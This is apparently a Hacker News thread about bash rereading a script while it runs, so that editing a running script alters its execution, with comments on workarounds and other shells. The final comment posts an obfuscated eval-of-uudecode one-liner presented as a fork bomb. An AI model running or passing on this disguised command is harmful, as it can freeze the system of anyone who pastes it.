
Take care editing bash scripts (2019) - cxr
https://thomask.sdf.org/blog/2019/11/09/take-care-editing-bash-scripts.html
======
photon-torpedo
Whether this happens or not depends on how the file is edited, I think. From
the strace output shown in TFA, it appears the file is not opened again
between executing the lines. E.g. using vim as editor, the modified file is
actually written as a new file under the same filename. In Linux, the bash
process will keep the original file open so that the inodes are not reclaimed
by the filesystem until the file is closed. Hence the bash process won't "see"
the modified script file.

I've tested this, and indeed when editing the file with vim, I can't reproduce
the "dangerous" behavior. To trigger this behavior, I'd have to _overwrite_
the script file, e.g. by

    
    
        1. create script run.sh with "sleep 30" etc
        2. create script run1.sh with "sleep 3" instead
        3. start run.sh
        4. overwrite script: cat run1.sh > run.sh
        5. after the sleep, the commented line does execute
    

Are there editors that actually overwrite the original file, instead of
creating a new file? I thought the latter is the recommended approach as it
can prevent data loss e.g. if there's a crash during writing the file.

P.S. If the script in question is on a network file system, things may be
different even for vim. E.g. on NFS the file handle doesn't behave fully like
a regular POSIX file handle, and the NFS server might actually reopen the file
between reads, thus delivering the modified contents to the bash process.

~~~
usefulcat
> E.g. using vim as editor, the modified file is actually written as a new
> file under the same filename.

I don't know much about the internal workings of vim, but I do know two
things:

1) I use vim exclusively (on linux anyway).

2) I have been bitten by this exact problem.

I guess I can understand why bash works this way.. it means that it can handle
arbitrarily long scripts without having to read the entire script into memory
at once. But purely from an everyday usability perspective, this is a really
bad design decision. Anyone know if there's a way to force it to read the
whole script into memory on startup?

~~~
fl0wenol
When writing a long script you should bundle everything into functions and
then call one that kicks everything off at the end. This prevents the problem
mentioned but also is helpful for keeping it organized.

~~~
firethief
I'm surprised that helps. Instead of the seeking behavior demonstrated in the
`strace`, does it switch to another way of keeping state after a backward
jump?

It would also have to buffer the whole file even though it's painstakingly
executing it in a way that doesn't require a buffer.

~~~
jolmg
I would imagine it's the same thing. It's going by top-level statement. The
backward jump is just to keep track of which top-level statement it has read
so far. It's not about being positioned on what it's currently running.

> painstakingly executing it in a way that doesn't require a buffer.

I don't understand why people keep saying that. There's a buffer of 64 bytes.
You mean in a way that doesn't require slurping the file. It avoids slurping
precisely by buffering.

------
ciprian_craciun
I'm glad someone finally wrote about this issue.

I have also stumbled upon this a few years ago, but I blamed myself (for using
an editor that saves in place), and just applied the following "workaround"
when needed: wrap the whole script in a function, and as the last line of the
script just call it with `_main "${@}"`.

~~~
Pawamoy
To expand on this, yes, you can force Bash to read more lines and keep them in
memory before executing them by wrapping them in blocks. These blocks can be
(), {}, functions, and maybe other structures.

In addition to this, you can make sure no appended code is ever executed by
explicitly running "exit" at the end of your block. I actually used this trick
in a self git-updating script (the updated version could contain more lines at
the end).

------
rasz
DOS/Windows Batch files behave same way. COMMAND.COM rereads whole batch file
every time it executes one command line.

    
    
        PING localhost -n 10
        #echo nothing to see here
        echo finish
    

D:\123>PING localhost -n 10

Pinging ... [127.0.0.1] with 32 bytes of data: Reply from 127.0.0.1: bytes=32
time<1ms TTL=64 ...

Ping statistics for 127.0.0.1: Packets: Sent = 10, Received = 10, Lost = 0 (0%
loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum =
0ms, Average = 0ms

D:\123>#echo nothing to see here '#echo' is not recognized as an internal or
external command, operable program or batch file.

D:\123>echo finish finish

now rerun it and edit first line to 'PING localhost -n 1' and suddenly

... Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum =
0ms, Average = 0ms

D:\123>echo nothing to see here nothing to see here

D:\123>echo finish finish

~~~
JdeBP
This is why Rex Conn's add-on command interpreter for MS/PC/DR-DOS, 4DOS, had
the concept of BTM scripts. BTM stands for "Batch To Memory" and 4DOS (and all
of its successors through NDOS, 4NT, and 4OS2 to the current Take Command)
reads the entirety of a BTM script before running it.

* [https://jpsoft.com/help/batchtype.htm](https://jpsoft.com/help/batchtype.htm)

The reason that this could not be simply turned on globally for BAT scripts is
that various tools made use of the original behaviour, perhaps most notably
"fancy change directory" scripts and similar programs, where a wrapped
executable was called from a wrapper script, and the executable rewrote the
next lines of the script on the fly to do the selected action.

------
acqq
I've continuously observed the described problem, and have read about a
workaround: when writing the "top level" lines of script, never write them
alone, but inside of a { }

It looks like this in my case:

    
    
        somefunction() 
        { 
        }
    
        # main
        {
           ...
        }
    

Now whatever is inside of any of the functions or inside of the "main" braces
will be read at once and it won't be replaced with some new lines if I edit
the file while the execution still hasn't finished.

I would surely prefer having some global flag "reread the script" for those
who need the old behavior and "sane" default for the most users (never
reread). But general user friendliness and reasonable defaults was seldom a
desired goal in the circles that decide about the development of these
programs.

~~~
chubot
Hm I put all shell code in functions for other reasons, but it's interesting
to know it solves another problem.

[http://www.oilshell.org/blog/2020/02/good-parts-
sketch.html#...](http://www.oilshell.org/blog/2020/02/good-parts-
sketch.html#the-0-dispatch-pattern-solves-three-important-problems)

To summarize:

1) saving many interactive snippets in a single file -- each one is a function

2) expose entire shell functions to tools like xargs and chroot

3) if $0 myfunc solves the "ignored errexit" problem

now

4) safely modify a bash script while it's executing

------
theodpHN
FWIW, the IBM mainframe world's partitioned dataset (PDS) addressed this issue
40+ years ago. Old processes continue to run with the version of the PDS
member they started with, while new processes start with a newer version, if
one exists. Similar to read consistency features of Oracle.

------
yjftsjthsd-h
Has this been reported as a bug? Because it strains credulity to think that
this is really intended behavior.

~~~
greggyb
I wouldn't predict this, but I don't find it terribly out of line.

Bash, and shells in general, are designed to be interactive command execution
environments. The syntax easily allows multiple commands on a single line, and
this is not uncommon in interactive or scripting use, in my experience. Many
shells also favor permissive execution. What I mean by this is that they will
keep running as far as they can. It is perfectly reasonable (at least based on
the behavior of many shells) for a script to run several commands successfully
and then fail later on when facing a syntax error or nonexistent command.

Many shells are also carrying design decisions from a much more resource-
constrained era of computing.

It certainly makes sense in terms of preserving system resources to simply
execute a command at a time, to full completion, before even reading forward.
This minimizes the amount of parsing and the amount of script required to keep
in memory. I am not saying that this is the best way to do things, but that it
is an optimization along certain axes.

Separately, it is not unreasonable in terms of design and implementation of a
shell to unify as much as possible the scripting environment and the
interactive environment. Keeping this in mind, the way to think of a script is
just as an interactive session. Each line is just a command entered at the
prompt. This ensures that behavior in scripts is the same as the behavior the
user sees every day. How to implement this, especially in the face of resource
constraints, in another way? I am not saying that the implementation as it
stands is correct or good, but just that this is not an unreasonable behavior.

~~~
ciprian_craciun
Furthermore I would say this is actually a "feature", as some scripts might be
too large to fit into limited memory, and also reading-and-executing one step
at a time allows one to write "dynamic" scripts that are generated as they are
executed.

Although I haven't written such "dynamic" scripts (yet), I'm sure a few exist
that based on `expect` and `bash` work in a "feedback-loop" manner.

~~~
ArchD
If you want to use a 'dynamic' script, why not pipe from stdin instead?

~~~
ciprian_craciun
Yes, you are right, pipes are mandatory here.

When I was referring to a "dynamic" script I didn't mean "just append to a
file", but instead I was referring to the fact that `bash` doesn't first try
to load the whole script, parse and then execute it, but instead it "streams"
through the script.

------
tannhaeuser
There used to be the "text file busy" error to prevent that from happening,
where "text" refers to the code segment of an ELF binary, but I've seen the
error for shell script "text" as well. Isn't there anymore?

~~~
duskwuff
That error only applies to executables that get mapped into memory while
running -- which is to say, binary executables. Script executables have never
had that behavior.

~~~
tannhaeuser
That makes sense, but I have faint memories of vi rejecting writes to running
scripts. Maybe it was on Solaris or AIX.

------
jcynix
It doesn't happen with the z-shell (zsh) as I just tested under Debian. Bash
shows the described behaviour. Interesting, need to look at other shells too,
later.

But it's definitely better to be careful and expect the bash ("classic"?)
behaviour.

~~~
clort
Bear in mind that bash is obviously restarting from the character position
specifically but other shells might not handle this at all, meaning that they
just use buffered stdin. For such a small script the whole thing has been read
into the buffer but a longer script might fault at an otherwise unobvious
point.

Unless you know that it is explicitly safe (ie the whole file has been cached
before it starts) then you should really not modify any running file.

------
atorodius
Oh wow! I had the feeling that something like this affected me a handful of
times but I was never sure and I couldn‘t reproduce so I just ignored. That‘s
quite crazy!

~~~
kristopolous
Stylistically it's outside the scope.

Bash is a classic style tool, if you hammer your thumb instead of a nail, that
doesn't mean the design of hammers need to be fixed. It's meant to be useful,
not smart.

This attitude is why the core utils have remained so damn useful for 50 years
and haven't devolved into dysfunctional messes.

choosing what not to do is important

------
downerending
IIRC, older versions of Python would run with a (writable) fd open to the
initial script. If you weren't paying attention, it was possible to
accidentally modify that script.

------
Uehreka
It’s weird, I’ve been using bash for over ten years now, and just started
noticing this behavior a couple weeks ago. It probably has to do with the
nature of the scripts I’m running these days (bash scripts that call docker
commands to build complicated images and then do other stuff). I could tell
that bash wasn’t reading the whole script before executing, but I didn’t spend
the time to figure out exactly what the real behavior was. Thanks to the
author for this analysis!

~~~
alexis_fr
I have noticed this behavior on Ubuntu in 13.13. On the other hand, I kept the
habit of expecting a script to fail when modifying it (most of the time,
starting a command in the middle makes it fail) but it never seems to occur on
macOS’s bash.

~~~
Y_Y
Was that the Ubuntu released in the 13th month of 2013, Fictional Ferret?

------
oddline
Yikes,

    
    
        $ cat rewrite_me 
        #!/bin/bash
        C=$(sed -r 's,^(C.+sed.+)#$,\1,g' ./$0); echo "$C" > $0  #####
        # date
    
        $ ./rewrite_me 
        Fri 08 May 2020 11:41:52 PM CEST

------
dooglius
This isn't specific to bash scripts, this can happen to pretty much any file.
What we really need is a way for a process to atomically "check out" a copy of
a file to read from that won't change.

~~~
wahern
An atomic read fork isn't sufficient. The file could be inconsistent if
another process is currently writing to the file at the moment of the
snapshot. What you need is an atomic write, which is already provided by
rename(2).

I've always found it odd that binaries and scripts are often installed 755,
including in /bin and /sbin.[1] Perhaps it's because install scripts don't
bother changing the read-write permissions, so executable end up with 755
because the default umask is 022.

Anyhow, I've taken to removing all write permissions from most of my files,
not just executables. I haven't yet experimented with changing my umask to
222, but I suspect it would cause many programs, especially editors, to fail.

[1] At least on Linux. I just checked OpenBSD and they're 555. But even on
OpenBSD most files in /usr/local/{bin,sbin}, installed by third-party
packages, are 755.

------
lisper
Title should be: Take Care Editing _Running_ BASH Scripts.

~~~
jolmg
Yeah, I was just thinking about how this could only happen when editing
scripts while they're running. It doesn't make sense to do that with regular,
non-interactive CLI scripts, but I guess it does with interactive ones that
display a TUI or prompt.

------
chrismorgan
Batch files on Windows do the same thing. That’s caught me out far more often,
because I make errors in my batch files much more often than I do with shell
scripts.

~~~
malkia
I was just going to comment on this. I believe batch files buffer on line, but
can't confirm.

~~~
jz_
They do.

Can be used it to interact with the execution of the current program. It is
simple as appending further code with a label and jumping to it using goto. I
first noticed it in 2007 started using it in production.

------
michaelmrose
I can reproduce this in bash but not in fish or zsh. This seems to be a
uniquely bad feature of bash.

~~~
0ld
yep, i've also checked bourne shell and csh/tcsh, cannot reproduce too. only
in bash

------
kristianp
I've noticed this behaviour in the past. I remember a sun solaris server at
work back around 2009 getting taken down by someone editing a script while it
was running. The scripts always had a rm -rf as part of cleanup of working
files.

------
renewiltord
I wonder if folks using Chef to ensure a file is present used a "clobber-
always" mode and had it behave correctly. I would imagine so since Chef should
make a new file. Anyway, a problem for an older age.

------
cracauer
This is why my directories with shell scripts have a "make install" target.
For execution they are copied to a place where they are unlinked before
written new.

~~~
JdeBP
As M. Ahern points out at
[https://news.ycombinator.com/item?id=23098813](https://news.ycombinator.com/item?id=23098813)
, that's only part of the job.

Assuming that you actually use rename() to do the unlinking and atomic
updating, the "make install" should _also_ ensure that write permission is
removed from the new files.

* [https://github.com/jdebp/nosh/blob/79b1c0aab9834a09a59e15d47...](https://github.com/jdebp/nosh/blob/79b1c0aab9834a09a59e15d47710f355c5c0417a/package/makeinstall#L30)

------
noisy_boy
I have seen this years ago when I was running a script and then thought of a
change and edit it while it was still running. The odd execution thereafter
gave it away.

------
einpoklum
I had always assumed that bash first read the whole script into memory (unless
it was huge), then parsed and interpreted it. Guess I was wrong. Thanks.

------
alok4nand
I may be missing something here, but why are things like this not repotrted as
a bug ?

~~~
jchw
It is not really a bug, just counter intuitive behavior. Their example is
somewhat contrived, usually this will just manifest in something being broken.

If you use an editor with safe saves this might not even happen because that
works by saving to a temp file and doing an atomic swap, and unlinking the old
file. In that case, I believe the script should continue as written, because
the fd should point to the unlinked file. I believe vim does this by default,
for example.

~~~
larschdk
Using rename() does this for you. It's actually guaranteed to preserve the
contents of the old file for any process still having it open while atomically
letting any future process only see the new file.

------
tragomaskhalos
Windows .bat files are notorious for this behaviour; disappointing to see it
in bash.

------
pnut
Hot patching is dangerous in all execution environments.

This is software engineering... Separate your dev environment from production
and do a controlled deployment.

~~~
rkangel
Every binary executable on a Linux system can be deleted and replaced while
the running program is unaffected. Every Python script can be edited while
it's running with no effect.

It comes as a surprise the first time you experience it that this rule doesn't
follow with bash scripts.

~~~
toast0
> Every binary executable on a Linux system can be deleted and replaced while
> the running program is unaffected.

Delete and replace is different than edit in place. I don't know about Linux,
but you can edit a binary on FreeBSD which is running, and it affects running
copies (it's all memory mapped from the file), and that's why i use install
instead of cp to update binaries (including shared libraries)

------
amelius
If you put such dangerous commands on your website, then please make them not
user-selectable.

~~~
netsharc
Oh lord... Are there any further baby-proofing you'd like to see?

~~~
yachtman
No one post any fork bombs...

~~~
Filligree
Such as this?

    
    
      eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

